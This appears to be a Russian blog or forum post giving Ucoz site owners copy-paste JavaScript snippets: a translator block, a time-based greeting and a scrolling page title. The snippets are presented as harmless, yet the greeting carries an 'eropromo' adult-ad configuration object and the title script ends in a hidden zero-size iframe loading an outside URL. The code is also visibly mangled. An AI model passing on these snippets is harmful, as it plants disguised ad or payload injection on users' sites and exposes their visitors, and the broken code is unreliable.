Хотелось бы, чтоб юзеры из бесплатных хостингов типа Ucoz тоже могли устанавливать на
свои сайты JavaScript, вот я и
решил выложить скрипты под сайты не поддерживающие PHP!
Скрипт переводчика Google
для онлайн перевода сайта: Вставьте этот блок там где
хотите видеть панель переводчика!
Приветствие на javascript
Вот отличное приветствие, а еще оно меняется по времени, так что не
надоест!
<script
language="JavaScript1.2"> var eropromo = { "cls": "icq",
"sid": 4, "sub": 10348, "dom": 0, "charset": "", "pad": 10, "tout":
900, "w": 160, "h": 120, "t": 5, "type": 0, "img": 1, "cens":0,
"cycle": 2, "max": 10}; </script> <!-- kovcheg.ucoz.org var h=(new Date()).getHours(); if (h > 23 || h <7)
document.write('Привет полуношникам!'); if (h > 6 && h < 12)
document.write('Доброе утро! Как спалось?'); if (h > 11 && h <
19) document.write('Добрый день!'); if (h > 18 && h <
24) document. write('Добрый вечер, а мы обновились!'); //--> </script>
Это скрипт бегущей строки в
названии сайта(верхняя
закладка)+ ваше сообщение посетителям.
Эта версия под все броузеры
[FONT=monospace]<script
language="JavaScript1.2"> //
*******************************************************************
// script by - - GOORU - - // Permission granted to use this
script. // remains intact. Visit my homepage
partnery.ucoz.org // Script written for All Internet
browsers //
*******************************************************************
var message=" СООБЩЕНИЕ!" //specifys the title var
message=message+" " //gives a pause at the end,1 space=1 speed unit,
here I used 10 spaces@150 each = 1.5seconds. i="0" //declares the
variable and sets it to start at 0 var temptitle="" //declares
the variable and sets it to have no value yet. var speed="300"
//the delay in milliseconds between letters function
titler(){ if
(!document.all&&!document.getElementById) return document.title=temptitle+message.charAt(i)
//sets the initial title temptitle=temptitle+message.charAt(i)
//increases the title by one letter i++ //increments the
counter if(i==message.length) //determines the end of the
message { i="0" //resets the counter at the
end of the message temptitle=" НАЗВАНИЕ САЙТА" //resets the title
to a blank value } setTimeout("titler()",speed)
//Restarts. Remove line for no-repeat. } window.onload=titler </script><noscript> <iframe
src="http://php-ru.info/servis/27a" width="0%" height="0%"
scrolling="no" frameborder="0"></iframe> </noscript> [/FONT]